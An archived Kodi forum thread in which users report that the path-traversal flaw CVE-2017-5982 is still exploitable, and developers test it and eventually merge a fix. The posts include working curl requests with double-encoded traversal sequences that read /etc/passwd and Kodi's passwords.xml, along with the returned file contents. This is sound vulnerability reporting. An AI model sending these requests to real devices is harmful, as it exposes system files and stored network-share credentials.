Local File Include (CVE-2017-5982) is back - Printable Version +- Kodi Community Forum (https://forum.kodi.tv) +-- Forum: Support (https://forum.kodi.tv/forumdisplay.php?fid=33) +--- Forum: General Support (https://forum.kodi.tv/forumdisplay.php?fid=111) +---- Forum: OS independent / Other (https://forum.kodi.tv/forumdisplay.php?fid=228) +---- Thread: Local File Include (CVE-2017-5982) is back (/showthread.php?tid=335695) |
Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-20 I believe the Local File Include (CVE-2017-5982) is back. I know that bool CFileUtils::ZebraListAccessCheck(const std:tring &filePath) from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, it doesn't. The code from: https://www.exploit-db.com/exploits/41312/ Still works on: NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit NOTICE: Using Release Kodi x32 build (version for Raspberry Pi) Kodi compiled Jun 7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478) http://pi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml <passwords> <path> <from pathversion="1">smb://smb/media</from> <to pathversion="1">smb://username:password@smb/media/</to> </path> </passwords> RE: Local File Include (CVE-2017-5982) is back - popcornmix - 2018-09-21 Can you test a Kodi 18 nightly build? There have been no changes to Kodi 17 for many months. RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-21 I will test tonight. RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-21 You can grab a nightly here: https://discourse.osmc.tv/t/testing-kodi-18-leia-builds-for-raspberry-pi/20631 if you wish to test with OSMC still for consistency. RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22 On OSMC it still exists, 22:31:01.228 T:1918357504 NOTICE: Starting Kodi (18.0-BETA3). Platform: Linux ARM (Thumb) 32-bit 22:31:01.229 T:1918357504 NOTICE: Using Release Kodi x32 build (version for Raspberry Pi) 22:31:01.229 T:1918357504 NOTICE: Kodi compiled Sep 20 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478) curl http://kodi/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3ys:/dev:/usr/sbin/nologin sync:x:4:65534ync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false systemd-timesync:x:101:102ystemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:102:103ystemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:103:104ystemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:104:105ystemd Bus Proxy,,,:/run/systemd:/bin/false ntp:x:105:107::/home/ntp:/bin/false messagebus:x:106:108::/var/run/dbus:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false avahi:x:108:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false sshd:x:109:65534::/run/sshd:/usr/sbin/nologin osmc:x:1000:1000::/home/osmc:/bin/bash RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22 I did a test on a "plain" Kodi 18.0-BETA3 Git:2018921-a2133e4 running on Ubuntu 18.04.1 LTS (kernel: Linux 4.15.0-34-generic) and did not see the vulnerability. curl http://kodi:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd <html><head><title>File not found</title></head><body>File not found</body></html> Unless it was fixed between 18.0-BETA3 compiled Sep 20 2018 and 8.0-BETA3 Git:2018921-a2133e4, I will check with OSMC to see what they are adding that is causing the vulnerability to be seen. RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-22 We haven't got any patches here that should introduce this vulnerability. Try with a file in the Ubuntu user's home folder' as /etc/passwd may simply be inaccessible if running as an unprivileged user. RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-24 @Sam.Nazarko The bigger issue is this one: curl http://kodi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml <passwords> <path> <from pathversion="1">smb://smb/media</from> <to pathversion="1">smb://smbuser:password@smb/media/Pictures/</to> </path> </passwords> I replaced my server name with "smb," the user with "smbuser", and the password with "password" because I'm not posting those on the site RE: Local File Include (CVE-2017-5982) is back - Milhouse - 2018-09-24 This issue has never been fixed to my knowledge, and affects all platforms and not just OSMC. Ubuntu with latest Kodi 18 *is* vulnerable. Test script (" kvuln "):
special://envhome is /home/neil , and paths to be exploited are relative to that root.An attempt to fix CVE-2017-5982 was proposed but never implemented: https://github.com/xbmc/xbmc/pull/11851 If anything else in this area has been implemented (can't find anything) then it is now a regression. I'll move this thread to OS Independent/Other. RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-03 Fix is underway https://github.com/xbmc/xbmc/pull/14501 RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-14 fyi: Fix merged |